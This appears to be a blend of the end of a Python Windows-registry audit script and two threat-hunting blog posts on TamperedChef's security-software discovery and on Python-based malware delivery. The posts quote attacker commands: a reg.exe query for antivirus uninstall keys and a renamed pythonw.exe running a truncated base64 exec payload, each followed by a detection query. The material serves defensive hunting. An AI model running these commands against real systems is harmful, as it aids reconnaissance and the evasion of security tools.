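    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE,
             "HKCR": winreg.HKEY_CLASSES_ROOT}

    def read_value(hive, key, name):
        try:
            with winreg.OpenKey(hives[hive], key) as k:
                return winreg.QueryValueEx(k, name)[0]
        except OSError:
            return None

    def list_subkeys(hive, key):
        out = []
        try:
            with winreg.OpenKey(hives[hive], key) as k:
                while True:
                    out.append(winreg.EnumKey(k, len(out)))
        except OSError:
            pass   # EnumKey raises when the index runs past the last subkey
        return out
    return read_value, list_subkeys


if __name__ == "__main__":
    readers = winreg_readers() if sys.platform == "win32" else fake_readers(FAKE_REGISTRY)
    for location, value, why in audit_registry(*readers):
        print(f"{why}: {location} = {value!r}")
```

Run it on a Windows host with an elevated prompt to read the HKLM locations; the HKCU checks describe only the current user's hive, so repeat them per profile when reviewing a shared machine.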

245. That's How TamperedChef Queries the System for Security Products

Hello everyone! It's very important for an adversary to collect information about the security software available on the compromised system. Let's look at another real-world example demonstrating how threat actors leverage Security Software Discovery (T1518.001) and Query Registry (T1012). So, according to this report, TamperedChef abused reg.exe (yes, again) to query the system registry in order to obtain information about installed security software, for example:

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Bitdefender" /v "UninstallString"

We can use security software names to build our detection:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("query" AND ("bitdefender" OR "g data antivirus" OR "checkpoint" OR "kasperskylabsetup" OR "fortinet" OR "zillya antivirus"))

See you tomorrow!

244. Adversaries Abuse Python to Deliver Commercial Malware

Hello everyone! We're all a bit tired of PowerShell. Even adversaries. So today we'll look at how they misuse another popular command and scripting interpreter: Python (T1059.006). According to this report, the adversary used AI-themed lures to trick a victim into installing ScreenConnect. Next the threat actors ran a malicious BAT file, which, among other things, executed a renamed pythonw.exe to run a base64-encoded command:

"pw.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHl6aXJpcyY2F...'))"

In general, nothing new, right? Base64 again. But why not use it for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND cmdline: "base64.b64decode"

See you tomorrow!